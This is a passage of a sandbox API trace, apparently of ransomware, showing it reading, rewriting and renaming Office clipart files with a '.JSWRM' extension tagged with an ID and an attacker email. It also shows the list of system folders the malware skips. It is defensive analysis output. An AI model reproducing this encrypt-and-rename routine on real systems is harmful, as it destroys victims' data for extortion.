dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7972) returned 1 [0093.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f20) returned 0x205850 [0093.469] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f20, lpOverlapped=0x0) returned 1 [0093.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.471] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f20, lpOverlapped=0x0) returned 1 [0093.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.483] CloseHandle (hObject=0x314) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0093.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0093.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0093.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.483] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.484] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2178, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03459_.WMF", cAlternateFileName="")) returned 1 [0093.484] lstrcmpiW (lpString1="PE03459_.WMF", lpString2=".") returned 1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="..") returned 1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="...") returned 1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="windows") returned -1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="recovery") returned -1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="perflogs") returned -1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="documents and settings") returned 1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="system volume information") returned -1 [0093.485] lstrcmpiW (lpString1="PE03459_.WMF", lpString2="msocache") returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03459_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03459_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03459_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03459_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03459_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03459_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0093.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.486] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8568) returned 1 [0093.486] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2170) returned 0x205850 [0093.486] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2170, lpOverlapped=0x0) returned 1 [0093.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.488] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2170, lpOverlapped=0x0) returned 1 [0093.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.489] CloseHandle (hObject=0x314) returned 1 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0093.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0093.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0093.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0093.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.489] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0093.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.490] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1664, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03464_.WMF", cAlternateFileName="")) returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2=".") returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="..") returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="...") returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="windows") returned -1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="recovery") returned -1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="perflogs") returned -1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="documents and settings") returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="system volume information") returned -1 [0093.490] lstrcmpiW (lpString1="PE03464_.WMF", lpString2="msocache") returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03464_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03464_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03464_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0093.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03464_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03464_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03464_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0093.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.491] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5732) returned 1 [0093.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1660) returned 0x205850 [0093.491] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1660, lpOverlapped=0x0) returned 1 [0093.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.493] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1660, lpOverlapped=0x0) returned 1 [0093.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.493] CloseHandle (hObject=0x314) returned 1 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0093.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0093.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0093.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.495] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03466_.WMF", cAlternateFileName="")) returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2=".") returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="..") returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="...") returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="windows") returned -1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="recovery") returned -1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="perflogs") returned -1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="documents and settings") returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="system volume information") returned -1 [0093.495] lstrcmpiW (lpString1="PE03466_.WMF", lpString2="msocache") returned 1 [0093.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03466_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03466_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03466_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03466_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03466_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03466_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0093.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.496] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16800) returned 1 [0093.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x41a0) returned 0x24d210 [0093.496] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x41a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x41a0, lpOverlapped=0x0) returned 1 [0093.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.498] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x41a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x41a0, lpOverlapped=0x0) returned 1 [0093.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.498] CloseHandle (hObject=0x314) returned 1 [0093.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: 